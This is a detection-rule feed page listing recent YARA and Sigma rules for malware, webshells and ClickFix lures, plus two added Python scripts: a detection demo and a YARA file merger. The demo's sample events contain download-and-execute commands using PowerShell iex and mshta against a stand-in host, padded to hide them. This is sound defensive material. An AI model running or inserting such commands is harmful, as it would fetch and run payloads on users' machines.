currently serving 23331 YARA rules and 4335 Sigma rules

New Rules per Day (chart not reproduced in this text version)

Newest YARA Rules

This table shows the newest additions to the YARA rule set.

Rule | Description | Date
MAL_GlassWorm_Campaign_Stage2_Nov25 | Detects the GlassWorm campaign second stage, which steals credentials | 30.11.2025
MAL_GlassWorm_Campaign_Dec_Stage_Nov25 | Detects JavaScript code used to decrypt GlassWorm stages | 30.11.2025
MAL_GlassWorm_Campaign_Encoded_Dec_Stage_Nov25 | Detects encoded JavaScript code used to decrypt GlassWorm stages | 30.11.2025
MAL_GlassWorm_Campaign_Stage1_Nov25 | Detects the GlassWorm campaign first stage, which uses the Solana blockchain as its C2 infrastructure | 30.11.2025
MAL_GlassWorm_Campaign_Final_Stage_Nov25 | Detects the GlassWorm campaign final stage, which acts as a backdoor | 30.11.2025
MAL_LNX_Medusa_Rootkit_Nov25 | Detects Medusa rootkit samples (Linux backdoor) | 29.11.2025
MAL_FormBook_Loader_Nov25 | Detects a loader used to deliver FormBook | 28.11.2025
EXPL_VMWare_ESXi_Forensic_Artifacts_CVE_2023_34048_Nov25 | Detects forensic artifacts related to VMware ESXi hypervisor exploitation activity (CVE-2023-34048) | 28.11.2025
PUA_PY_VMWare_Cert_Extractor_Nov25 | Detects a Python script that extracts extra certificates from VMware vCenter MDB database files | 28.11.2025
PUA_ELF_Volatility_Analyzer_Nov25 | Detects the Volatility Analyzer, which can be used to extract credentials and other confidential information from memory dumps of Linux hosts | 28.11.2025
PUA_HKTL_V2Ray_Proxy_Tool_Nov25 | Detects binaries and archives related to the V2Ray proxy platform, which is commonly used to bypass network controls and occasionally abused in intrusion operations | 28.11.2025
SUSP_Base64_Redicrect_Nov25 | Detects suspicious base64 decode and redirection patterns often used in loaders | 28.11.2025
SUSP_WEBSHELL_Dropper_Base64_Nov25 | Detects suspicious base64 decode and redirection patterns often used in loaders | 28.11.2025
PUA_HKTL_V2Ray_Config_Nov25 | Detects configuration files related to the V2Ray proxy platform, which is commonly used to bypass network controls and occasionally abused in intrusion operations | 28.11.2025
SUSP_PY_Web_Server_Nov25 | Detects simple Python code that starts an HTTP server | 28.11.2025
MAL_Snake_Disk_Worm_Nov25 | Detects Snake Disk Worm malware used by the Mustang Panda APT group | 27.11.2025
MAL_ToneShell_Nov25 | Detects the ToneShell (v8, v9) backdoor used by the Mustang Panda APT group | 26.11.2025
MAL_LNX_SWORD_RAT_Nov25 | Detects Linux Sword RAT, which lets an attacker control infected machines remotely using commands (cat, cd, cpls, mkdir, rm, rmdir, socks, job, stopplugin, loadplugin, remove, mv, rsocks, net, stat, ps, pwd, whoami, plugins, pluginrun, pluginrunasync, insmod, append_lines, remove_lines) | 26.11.2025
SUSP_KALI_INDICATOR_Nov25 | Detects files containing a Kali Linux home directory path, which may indicate they were compiled on Kali Linux with malicious intent | 26.11.2025
SUSP_NPM_SupplyChain_Attack_PreInstallScript_Nov25 | Detects a suspicious preinstall script in package.json | 25.11.2025
SUSP_NPM_SupplyChain_Attack_PostInstallScript_Nov25_2 | Detects a suspicious postinstall script in package.json | 25.11.2025
MAL_Toneshell_Loader_Nov25 | Detects a loader used to load ToneShell version 7 and Pubload | 25.11.2025
MAL_NET_Blackhawk_Loader_Nov25 | Detects the BLACKHAWK loader, which uses process hollowing to inject a payload into a legitimate process | 25.11.2025
MAL_JS_NPM_SupplyChain_Attack_Nov25 | Detects the malicious JavaScript worm file bun_environment.js | 24.11.2025
SUSP_JS_NPM_Sha1_Hulud_Nov25 | Detects suspicious indicators of the Sha1 Hulud worm | 24.11.2025
SUSP_JS_NPM_SetupScript_Nov25 | Detects suspicious JavaScript that checks the operating system and exits silently | 24.11.2025
MAL_NPM_SupplyChain_Attack_PreInstallScript_Nov25 | Detects a known malicious preinstall script in package.json | 24.11.2025
HKTL_ServiceLoader_RepairAgent_Nov25 | Detects the service loader and repair module responsible for executing the --install and --repair commands, validating Explorer-based DLL loading, and checking operational network ports during deployment | 24.11.2025
HKTL_UploadMonitor_WorkerThread_Nov25 | Detects the upload-monitoring component that initializes logging, launches upload worker threads, tracks modified content, and prepares data for exfiltration workflows | 24.11.2025
MAL_LNK_PWSH_EXEC_Nov25 | Detects a suspicious LNK file that contains encoded PowerShell script execution | 24.11.2025

Successful YARA Rules in Set

This table shows the best-performing rules, i.e. those whose matched samples have the lowest average AV detection rate (rules created in the last 12 months, matches from the last 14 days).

Rule | Average AV Detection Rate | Sample Count
MAL_GuLoader_Shellcode_Oct22_3 | 0.0 | 20
SUSP_MAL_EXFIL_Stealer_Output_Characteristics_Sep22_1 | 0.04 | 180
SUSP_PY_OBFUSC_Berserker_Indicators_Dec22_1 | 0.21 | 14
SUSP_BAT_OBFUSC_Apr23_2 | 0.59 | 64
SUSP_Encrypted_ZIP_Suspicious_Contents_Jul23_1_File | 0.64 | 11
SUSP_PUA_RustDesk_Apr23_1 | 0.68 | 22
SUSP_BAT_PS1_Combo_Jan23_2 | 0.71 | 45
SUSP_JS_OBFUSC_Feb23_2 | 1.04 | 1736
SUSP_WEvtUtil_ClearLogs_Sep22_1 | 1.12 | 43
SUSP_CryptBase_PE_Info_NOT_Cryptbase_Feb23 | 1.19 | 21
SUSP_OBFUSC_PY_Loader_Jun23_1 | 1.48 | 21
SUSP_Webshell_OBFUSC_Indicators_Aug22_1 | 2.07 | 14
SUSP_URL_Split_Jun23 | 2.5 | 18
SUSP_OBFUSC_JS_Atob_Anomalies_Feb23 | 2.69 | 13
PUA_RuskDesk_Remote_Desktop_Jun23_1 | 2.78 | 18
SUSP_JS_Redirector_Mar23 | 2.81 | 108
SUSP_JS_Executing_Powershell_Apr23 | 3.14 | 274
SUSP_PY_Reverse_Shell_Indicators_Jan23_1 | 3.25 | 16
SUSP_OBFUSC_JS_Execute_Base64_Mar23 | 3.26 | 34
SUSP_Encoded_Registry_Key_Paths_Sep22_1 | 3.39 | 64
SUSP_PE_OK_RU_URL_Jun23 | 3.59 | 17
HKTL_Clash_Tunneling_Tool_Aug22_2 | 3.75 | 16
SUSP_PY_OBFUSC_Hyperion_Aug22_1 | 4.0 | 13
SUSP_BAT_OBFUSC_Apr23_1 | 4.0 | 16
SUSP_RANSOM_Note_Aug22 | 4.01 | 171
SUSP_OBFUSC_JS_Atob_Anomalies_Feb23_2 | 4.52 | 67
SUSP_BAT_PS1_Contents_Jan23_1 | 5.11 | 18
SUSP_OBFUSC_PS1_FormatStrings_Dec22_1 | 5.33 | 12
SUSP_BAT_OBFUSC_Apr23_4 | 5.35 | 26
SUSP_OBFUSC_BAT_Dec22_1 | 5.84 | 31

Latest YARA Matches with Low AV Detection Rate

This table lists the most recent matches with low AV detection rates (between 0 and 15 AV engines flagging the sample).

Rule | AVs | Hash (SHA-256)
Generic_Strings_Hacktools | 13 | 293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
SUSP_HKTL_Hacktool_Strings_Oct21_1 | 13 | 293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
SUSP_EXPL_ShellCode_Loader_Nov22_1 | 13 | 293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
Generic_Exploit_Strings_Oct18 | 13 | 293d5ebf4e3901fab9de2c23e6920af98778447b91e5bab2e3e45ba008050181
MAL_CRIME_RAT_WIN_PE_GodRat_Aug25 | 4 | 1a6e5aadab82ecbd96ca70dd3dc7dab71b720649fc14dba7fdf0c9be3b9c58f1
SUSP_Encoded_PS_EP_Bypass | 9 | eba7bdbb47ec06d66936726f0e50130691339f5a52490efd9268165734bafdaa
SUSP_Encoded_PS_EP_Bypass | 11 | da971063538662c11758d33f9ceec923774035a0b2e4ce81d614b0e36d4fc041
HKTL_ThreadlessInject_Feb23_1 | 13 | 810e887781dfe80730b686e2f499a3ce1e39b084ffe5712328dcf52b2d230a69
SUSP_HKTL_Hacktool_Strings_Oct21_1 | 13 | 810e887781dfe80730b686e2f499a3ce1e39b084ffe5712328dcf52b2d230a69
Generic_Strings_Hacktools | 13 | 810e887781dfe80730b686e2f499a3ce1e39b084ffe5712328dcf52b2d230a69
SUSP_EXPL_ShellCode_Loader_Nov22_1 | 12 | 06d64e4a808306a8ad31b7de61320cb54199f7eea75221810fba7d1e2c507ac2
HKTL_Portscan_SZ_PORTSCAN | 5 | 970109320e89ed83e64766d3aca8c830544ba81f3237686a41b0ff7a6c62fc79
Hacktool_PortScan | 5 | 970109320e89ed83e64766d3aca8c830544ba81f3237686a41b0ff7a6c62fc79
HKTL_MAL_CobaltStrike_Loader_Feb23_1 | 12 | b9ae362ea9b05990225a44b040627a2578542b4f3f9b4253f1d0ce540ef480da
HKTL_WIN_PE_Injection_Sep25 | 12 | b9ae362ea9b05990225a44b040627a2578542b4f3f9b4253f1d0ce540ef480da
MAL_LNX_SH_CryptoMiner_Campaign_Dec20_1 | 11 | 0623222eb941a432cce79068053cb9d11c8ef491b7093350f4cad1f4e3b01f2d
MAL_Emmenhtal_Sep24 | 13 | 2d59d8495a5c1e9646ce11ea1bbf5ef08e42f9c57a9a7e3fbd248ae369c872e4
SUSP_HKTL_Gen_Pattern_Feb25_2 | 9 | 48c068e2dd7d4e980b6b022d5ac5010d5444b773cfb68c718fe3c0af2127b6de
WEBSHELL_PHP_Indicators_Aug25 | 12 | cfdafd18dcaf8bae9c5d4ac564fa317d1ef33e99fdab8aec46424d1d8adcdede
WEBSHELL_PHP_By_String_Known_Webshell | 12 | cfdafd18dcaf8bae9c5d4ac564fa317d1ef33e99fdab8aec46424d1d8adcdede

YARA Rules Per Category

This list shows the number of YARA rules in the subscribable categories (the counts overlap, as a rule can belong to several categories).

Tag | Count
Malware | 7274
Threat Hunting (not subscribable, only in THOR scanner) | 5695
APT | 5037
Hacktools | 4776
Webshells | 2396
Exploits | 701

Newest Sigma Rules

This table shows the newest additions to the Sigma rule set.

Rule | Description | Date
AWS GuardDuty Detector Deleted Or Updated | Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of their malicious activities. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. Verify with the user identity that this activity is legitimate. | 27.11.2025
Renamed Schtasks Execution | Detects the execution of a renamed schtasks.exe binary, a legitimate Windows utility for scheduling tasks. One very common persistence technique is scheduling malicious tasks with schtasks.exe. Since it is heavily abused, it is also heavily monitored by security products, so threat actors may rename the schtasks.exe binary to evade detection. | 27.11.2025
Grixba Malware Reconnaissance Activity | Detects execution of the Grixba reconnaissance tool based on suspicious command-line parameter combinations. This tool is used by the Play ransomware group for network enumeration, data gathering, and event log clearing. | 26.11.2025
Suspicious FileFix Execution Pattern | Detects suspicious FileFix execution patterns, in which users are tricked into running malicious commands through browser file-upload dialog manipulation. The attack typically begins when users visit malicious websites impersonating legitimate services or news platforms, which may display fake CAPTCHA challenges or direct instructions to open File Explorer and paste clipboard content. The clipboard content usually contains commands that download and execute malware, such as information stealers. | 24.11.2025
HackTool - WSASS Execution | Detects execution of WSASS, a tool that dumps LSASS memory on Windows by leveraging Windows Error Reporting's WerFaultSecure.exe to bypass PPL (Protected Process Light) protections. | 23.11.2025
Windows Default Domain GPO Modification via GPME | Detects the use of the Group Policy Management Editor (GPME) to modify the Default Domain or Default Domain Controllers Group Policy Objects (GPOs). Adversaries may leverage GPME to make stealthy changes to these default GPOs and deploy malicious GPO configurations across the domain without raising suspicion. | 22.11.2025
Unsigned .node File Loaded | Detects the loading of unsigned .node files. Adversaries may abuse the lack of .node integrity checking to execute arbitrary code inside trusted applications such as Slack. .node files are native add-ons for Electron-based applications, which are commonly used for desktop applications like Slack, Discord, and Visual Studio Code. This technique has been observed in the DripLoader malware, which uses unsigned .node files to load malicious native code into Electron applications. | 22.11.2025
Windows Default Domain GPO Modification | Detects modifications to the Default Domain or Default Domain Controllers Group Policy Objects (GPOs). Adversaries may modify these default GPOs to deploy malicious configurations across the domain. | 22.11.2025
Suspicious Filename with Embedded Base64 Commands | Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns. | 22.11.2025
Atomic MacOS Stealer - Persistence Indicators | Detects creation of persistence artifacts placed by Atomic MacOS Stealer on macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise. | 22.11.2025
Atomic MacOS Stealer - FileGrabber Activity | Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity. | 22.11.2025
Suspicious Child Process Spawned by Node.js | Detects suspicious child processes spawned by Node.js that could indicate compromised npm packages or malicious scripts. Malicious packages often use install/preinstall scripts to execute unauthorized system commands through such child processes. Investigate immediately, as this may indicate package compromise or malicious code execution. | 21.11.2025
Suspicious DNS Exfiltration via Command Line | Detects potential data exfiltration using DNS lookups with encoded data, typically used by malicious scripts. This technique may involve encoding data (e.g., using xxd) and sending it via DNS queries (e.g., using nslookup). | 21.11.2025
Cisco ASA Exploitation Activity - Proxy | Detects suspicious requests to Cisco ASA WebVPN in proxy logs that are associated with exploitation of CVE-2025-20333 and CVE-2025-20362. | 20.11.2025
Suspicious ClickFix/FileFix Execution Pattern | Detects suspicious execution patterns in which users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or the File Explorer address bar (FileFix). Attackers leverage social engineering campaigns, such as fake CAPTCHA challenges or urgent alerts, to encourage victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems. | 19.11.2025
DNS Query by Finger Utility | Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication. | 19.11.2025
Network Connection Initiated via Finger.EXE | Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. Investigating such network connections can also help identify potential malicious infrastructure used by threat actors. | 19.11.2025
Suspicious Kerberos Ticket Request via CLI | Detects suspicious Kerberos ticket requests made from the command line using the System.IdentityModel.Tokens.KerberosRequestorSecurityToken class. Threat actors may use command-line interfaces to request Kerberos tickets for service accounts in order to perform offline password cracking (Kerberoasting) or other Kerberos ticket abuse techniques such as silver ticket attacks. | 18.11.2025
RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class | Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell. In PowerShell one-liners, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP. In WMIC, the "rdtoggle" alias or the "Win32_TerminalServiceSetting" class may be used for the same purpose. | 15.11.2025
Uncommon Svchost Command Line Parameter | Detects instances of svchost.exe running with an unusual or uncommon command-line parameter by excluding known legitimate or common patterns. This could point to a file masquerading as svchost, process injection, or hollowing of a legitimate svchost instance. | 14.11.2025
Suspicious Usage of For Loop with Recursive Directory Search in CMD | Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing. This pattern may indicate an attempt to discover and execute system binaries dynamically (for example powershell.exe), a technique sometimes used by attackers to evade detection. This behavior has been observed in various malicious LNK files. | 12.11.2025
Suspicious Space Characters in RunMRU Registry Path - ClickFix | Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using ClickFix techniques to hide malicious commands in the Windows Run dialog from the naked eye. | 04.11.2025
Suspicious Space Characters in TypedPaths Registry Path - FileFix | Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using FileFix techniques to hide malicious commands. | 04.11.2025
Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix | Detects process creation with suspicious whitespace padding followed by a '#' character, which may indicate ClickFix or FileFix techniques used to conceal malicious commands from visual inspection. ClickFix and FileFix are social engineering techniques in which adversaries distribute phishing documents or malicious links that deceive users into opening the Windows Run dialog or the File Explorer search bar. The victims are then instructed to paste commands from their clipboard, which contain extensive whitespace padding using various Unicode space characters to push the actual malicious command far to the right, effectively hiding it from immediate view. | 04.11.2025
FortiGate - New Administrator Account Created | Detects the creation of an administrator account on a Fortinet FortiGate firewall. | 01.11.2025
FortiGate - Firewall Address Object Added | Detects the addition of firewall address objects on a Fortinet FortiGate firewall. | 01.11.2025
FortiGate - New Firewall Policy Added | Detects the addition of a new firewall policy on a Fortinet FortiGate firewall. | 01.11.2025
FortiGate - New Local User Created | Detects the creation of a new local user on a Fortinet FortiGate firewall. The new local user could be used for VPN connections. | 01.11.2025
FortiGate - User Group Modified | Detects the modification of a user group on a Fortinet FortiGate firewall. The group could be used to grant VPN access to a network. | 01.11.2025
FortiGate - New VPN SSL Web Portal Added | Detects the addition of a VPN SSL web portal on a Fortinet FortiGate firewall. This behavior was observed together with modification of VPN SSL settings. | 01.11.2025
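The table above gives each rule's intent but not its detection logic. As an added example (my own code, not Nextron's Sigma rules and not a substitute for them), the following Python re-implements three of the described checks and runs them over constructed Sysmon-style events, using the field names Sigma uses for the process_creation and registry_set log sources: the renamed schtasks.exe check (PE OriginalFileName says schtasks.exe but the image path does not), an explorer.exe child whose command line is padded with whitespace before a '#', and RunMRU/TypedPaths values holding an unusual number of space characters. The thresholds, the set of Unicode space characters, the requirement that the parent process be explorer.exe, and the sample events are all my assumptions.

```python
"""Toy re-implementation of three detections described in the Sigma feed,
evaluated over constructed Sysmon-style events.  Added example; the logic
is derived from the rule descriptions, not from the real Sigma rules."""
import re

# Space characters used to push a command out of view (assumed set): ASCII
# space and tab plus the Unicode space family (NBSP, U+2000-U+200A, U+202F,
# U+205F, U+3000).  str.isspace() is avoided because it also accepts newlines.
SPACE_CLASS = "[ \t\u00a0\u2000-\u200a\u202f\u205f\u3000]"
PADDED_HASH_RE = re.compile(SPACE_CLASS + "{20,}#")   # >=20 spaces then '#'
SPACE_RE = re.compile(SPACE_CLASS)


def renamed_schtasks(ev):
    """PE version info says schtasks.exe, but the file on disk is named differently."""
    return (ev.get("EventType") == "process_creation"
            and ev.get("OriginalFileName", "").lower() == "schtasks.exe"
            and not ev.get("Image", "").lower().endswith("\\schtasks.exe"))


def explorer_padded_command(ev):
    """Child of explorer.exe (Run dialog / address bar) whose command line hides
    a '#' comment behind a long run of (possibly Unicode) spaces."""
    return (ev.get("EventType") == "process_creation"
            and ev.get("ParentImage", "").lower().endswith("\\explorer.exe")
            and PADDED_HASH_RE.search(ev.get("CommandLine", "")) is not None)


def padded_runmru_or_typedpaths(ev, min_spaces=20):
    """RunMRU (Run dialog history) or TypedPaths (Explorer address bar history)
    value that contains an unusual number of space characters."""
    if ev.get("EventType") != "registry_set":
        return False
    target = ev.get("TargetObject", "").lower()
    if "\\runmru\\" not in target and "\\typedpaths\\" not in target:
        return False
    return len(SPACE_RE.findall(ev.get("Details", ""))) >= min_spaces


RULES = [
    ("Renamed Schtasks Execution", renamed_schtasks),
    ("Suspicious Explorer Process with Whitespace Padding - ClickFix/FileFix", explorer_padded_command),
    ("Suspicious Space Characters in RunMRU Registry Path - ClickFix", padded_runmru_or_typedpaths),
]


def evaluate(events):
    """Return (rule title, event index) for every rule that fires on every event."""
    return [(title, idx) for idx, ev in enumerate(events)
            for title, check in RULES if check(ev)]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"EventType": "process_creation", "Image": r"C:\Windows\System32\schtasks.exe",
     "OriginalFileName": "schtasks.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "schtasks /query /tn Backup"},                       # benign
    {"EventType": "process_creation", "Image": r"C:\Users\Public\svc.exe",
     "OriginalFileName": "schtasks.exe", "ParentImage": r"C:\Users\Public\stage.exe",
     "CommandLine": r"svc.exe /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\u.exe"},
    {"EventType": "process_creation",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://lure.invalid/a.ps1|iex"'
                    + " " * 40 + "\u2000" * 20
                    + "# I am not a robot - reCAPTCHA Verification ID: 7811"},
    {"EventType": "registry_set",
     "TargetObject": r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": "mshta http://lure.invalid/x.hta" + " " * 60 + "# Verification step 2"},
    {"EventType": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c echo hi"},                               # benign
]

if __name__ == "__main__":
    for title, idx in evaluate(SAMPLE_EVENTS):
        print(f"event[{idx}]: {title}")
```

Events 1, 2 and 3 fire one rule each; the two benign events fire nothing. The padding regex deliberately accepts Unicode spaces, since the RunMRU/TypedPaths rules would otherwise be trivially bypassed by swapping ASCII spaces for U+2000-style characters that render identically in the Run dialog.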

YARA/SIGMA Rule Count

Rule Type | Community Feed | Nextron Private Feed
YARA | 2709 | 20622
Sigma | 3510 | 825

Sigma Rules Per Category (Community)

Type | Count
windows / process_creation | 1319
windows / registry_set | 214
windows / file_event | 203
windows / ps_script | 165
windows / security | 160
linux / process_creation | 128
windows / image_load | 112
webserver | 82
windows / system | 74
macos / process_creation | 68
aws / cloudtrail | 55
proxy | 54
windows / network_connection | 53
linux / auditd | 53
azure / activitylogs | 42
windows / registry_event | 40
azure / auditlogs | 38
windows / ps_module | 33
windows / application | 31
windows / dns_query | 26
azure / signinlogs | 24
windows / process_access | 23
okta / okta | 22
azure / riskdetection | 19
windows / pipe_created | 18
opencanary / application | 18
rpc_firewall / application | 17
windows / windefend | 16
github / audit | 16
linux | 16
gcp / gcp.audit | 16
bitbucket / audit | 14
m365 / threat_management | 13
windows / file_delete | 13
linux / file_event | 13
cisco / aaa | 12
windows / create_remote_thread | 12
windows / driver_load | 10
kubernetes / application / audit | 10
windows / codeintegrity-operational | 10
windows / ps_classic_start | 9
dns | 9
windows / create_stream_hash | 9
windows / registry_delete | 9
windows / firewall-as | 8
windows / msexchange-management | 8
antivirus | 7
fortigate / event | 7
windows / appxdeployment-server | 7
windows / file_access | 7
azure / pim | 7
windows / bits-client | 7
zeek / smb_files | 7
gcp / google_workspace.admin | 7
windows / dns-client | 6
jvm / application | 5
kubernetes / audit | 5
zeek / dns | 5
linux / network_connection | 5
zeek / http | 5
windows / sysmon | 4
windows / taskscheduler | 4
windows / iis-configuration | 4
zeek / dce_rpc | 4
macos / file_event | 3
windows / wmi_event | 3
windows / powershell-classic | 3
windows / ntlm | 3
windows / registry_add | 3
linux / sshd | 3
m365 / audit | 3
windows / dns-server | 2
apache | 2
spring / application | 2
onelogin / onelogin.events | 2
firewall | 2
linux / syslog | 2
windows / file_change | 2
windows / security-mitigations | 2
m365 / exchange | 1
zeek / rdp | 1
windows / smbclient-security | 1
windows / file_rename | 1
ruby_on_rails / application | 1
m365 / threat_detection | 1
zeek / kerberos | 1
windows / terminalservices-localsessionmanager | 1
windows / sysmon_status | 1
velocity / application | 1
windows / driver-framework | 1
windows | 1
windows / sysmon_error | 1
sql / application | 1
cisco / duo | 1
cisco / bgp | 1
nginx | 1
linux / sudo | 1
cisco / ldp | 1
windows / ldap | 1
windows / wmi | 1
windows / dns-server-analytic | 1
windows / lsa-server | 1
windows / ps_classic_provider_start | 1
windows / printservice-admin | 1
database | 1
linux / clamav | 1
windows / applocker | 1
windows / printservice-operational | 1
linux / guacamole | 1
django / application | 1
linux / auth | 1
linux / cron | 1
huawei / bgp | 1
windows / appmodel-runtime | 1
windows / openssh | 1
fortios / sslvpnd | 1
juniper / bgp | 1
windows / appxpackaging-om | 1
windows / process_tampering | 1
cisco / syslog | 1
windows / smbclient-connectivity | 1
windows / smbserver-connectivity | 1
paloalto / file_event / globalprotect | 1
linux / vsftpd | 1
windows / capi2 | 1
windows / shell-core | 1
windows / raw_access_thread | 1
paloalto / appliance / globalprotect | 1
zeek / x509 | 1
windows / certificateservicesclient-lifecycle-system | 1
windows / microsoft-servicebus-client | 1
nodejs / application | 1
python / application | 1
windows / diagnosis-scripted | 1
windows / file_executable_detected | 1

Sigma Rules Per Category (Nextron Private Feed)

Type | Count
windows / process_creation | 390
windows / registry_set | 78
windows / ps_script | 76
windows / image_load | 43
windows / file_event | 38
linux / process_creation | 36
windows / wmi | 29
windows / security | 22
proxy | 12
windows / system | 9
windows / network_connection | 8
windows / registry_event | 8
windows / kernel-event-tracing | 6
windows / ntfs | 5
windows / ps_module | 5
windows / create_remote_thread | 4
windows / pipe_created | 4
windows / sense | 4
windows / taskscheduler | 4
windows / registry_delete | 4
windows / hyper-v-worker | 3
windows / ps_classic_script | 3
windows / vhd | 3
webserver | 3
windows / driver_load | 3
windows / application-experience | 3
windows / codeintegrity-operational | 2
windows / kernel-shimengine | 2
windows / windefend | 2
windows / process_access | 2
windows / bits-client | 2
windows / firewall-as | 1
windows / file_delete | 1
windows / registry-setinformation | 1
linux / file_event | 1
windows / file_rename | 1
windows / dns_query | 1
macos / process_creation | 1
windows / amsi | 1
windows / process-creation | 1
windows / application | 1
windows / file_access | 1
windows / audit-cve | 1

Tenable Nessus

Requirement: Privileged Scan

  • YARA scanning with Nessus only works in a credentialed (privileged) scan
Tutorial: https://docs.tenable.com/nessus/Content/CredentialedChecksOnWindows.htm

YARA Scanning with Nessus

  • Only a single .yar file can be uploaded
  • The filesystem scan has to be activated
  • The target locations (paths to scan) have to be defined
  • Results are reported under Nessus plugin ID 91990
  • Only files with the following extensions can be scanned: .application, .asp, .aspx, .bat, .chm, .class, .cmd, .com, .cp, .csh, .dl, .doc, .docx, .drv, .exe, .gadget, .hta, .inf, .ins, .inx, .isu, .jar, .job, .jpeg, .jpg, .js, .jse, .jse, .jsp, .lnk, .msc, .msi, .msp, .mst, .paf, .pdf, .php, .pif, .ppt, .pptx, .ps1, .ps1xm, .ps2, .ps2xm, .psc1, .psc2, .reg, .rgs, .scf, .scr, .sct, .shb, .shs, .swf, .sys, .u3p, .vb, .vbe, .vbs, .vbscript, .ws, .wsf, .xls, .xls
Tutorial: https://de.tenable.com/blog/threat-hunting-with-yara-and-nessus
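Because the Nessus plugin takes exactly one .yar file, a subscriber who downloads several Valhalla rule files (or mixes them with in-house rules) has to merge them before uploading. The script below is an added example written for this page, not Nextron's or Tenable's code: it concatenates every .yar/.yara file under a directory into one file, hoists the `import` statements to the top and de-duplicates them, and drops any rule whose name has already been seen, because YARA refuses to compile a rule set that defines the same rule name twice. It deliberately does not depend on yara-python, so it can run on the analyst workstation that prepares the upload. The directory layout, the file extensions, and the two in-line sample rule files are assumptions.

```python
"""Merge several YARA rule files into the single .yar file the Nessus YARA
plugin accepts.  Added example for this page, not Nextron or Tenable code.
Assumptions: rule files end in .yar/.yara; a rule name seen a second time is
dropped (YARA refuses to compile two rules with the same name)."""
import re
import sys
from pathlib import Path

IMPORT_RE = re.compile(r'^\s*import\s+"([^"]+)"\s*$')
RULE_HEADER_RE = re.compile(r"(?:(?:private|global)\s+)*rule\s+([A-Za-z_]\w*)")


def split_rules(text):
    """Return [(rule_name, rule_source), ...] for the top-level rules in a .yar
    file.  A small scanner skips comments, text strings and regex literals so
    that braces inside them (e.g. $s = "}" or a // comment) cannot unbalance
    the brace matching that delimits each rule body."""
    rules, i, n = [], 0, len(text)
    depth, start, name = 0, None, None
    while i < n:
        c = text[i]
        if text.startswith("//", i):                      # line comment
            j = text.find("\n", i)
            i = n if j < 0 else j
            continue
        if text.startswith("/*", i):                      # block comment
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
            continue
        if c == '"':                                      # text string, honour escapes
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            i = j + 1
            continue
        prev = text[max(0, i - 12):i].rstrip()
        if c == "/" and (prev.endswith("=") or prev.endswith("matches")):
            j = i + 1                                     # regex literal /.../
            while j < n and text[j] != "/":
                j += 2 if text[j] == "\\" else 1
            i = j + 1
            continue
        if depth == 0 and start is None:                  # look for a rule header
            at_word_start = i == 0 or not (text[i - 1].isalnum() or text[i - 1] == "_")
            m = RULE_HEADER_RE.match(text, i) if at_word_start else None
            if m:
                start, name = i, m.group(1)
                i = m.end()
                continue
        if c == "{":
            depth += 1
        elif c == "}":
            depth -= 1
            if depth == 0 and start is not None:          # rule body closed
                rules.append((name, text[start:i + 1]))
                start = name = None
        i += 1
    return rules


def merge_rule_texts(sources):
    """sources: iterable of (label, text).  Returns (merged_text, dropped) where
    dropped lists (rule_name, label) for every duplicate rule that was skipped."""
    imports, seen, body, dropped = [], set(), [], []
    for label, text in sources:
        for line in text.splitlines():
            m = IMPORT_RE.match(line)
            if m and m.group(1) not in imports:
                imports.append(m.group(1))
        for rule_name, src in split_rules(text):
            if rule_name in seen:
                dropped.append((rule_name, label))
                continue
            seen.add(rule_name)
            body.append(src)
    header = "".join(f'import "{mod}"\n' for mod in imports)
    return header + "\n" + "\n\n".join(body) + "\n", dropped


def merge_rule_files(directory, out_path):
    """Merge all .yar/.yara files below `directory` into `out_path`."""
    paths = sorted(p for p in Path(directory).rglob("*") if p.suffix in (".yar", ".yara"))
    merged, dropped = merge_rule_texts(
        (str(p), p.read_text(encoding="utf-8", errors="replace")) for p in paths)
    Path(out_path).write_text(merged, encoding="utf-8")
    return len(paths), dropped


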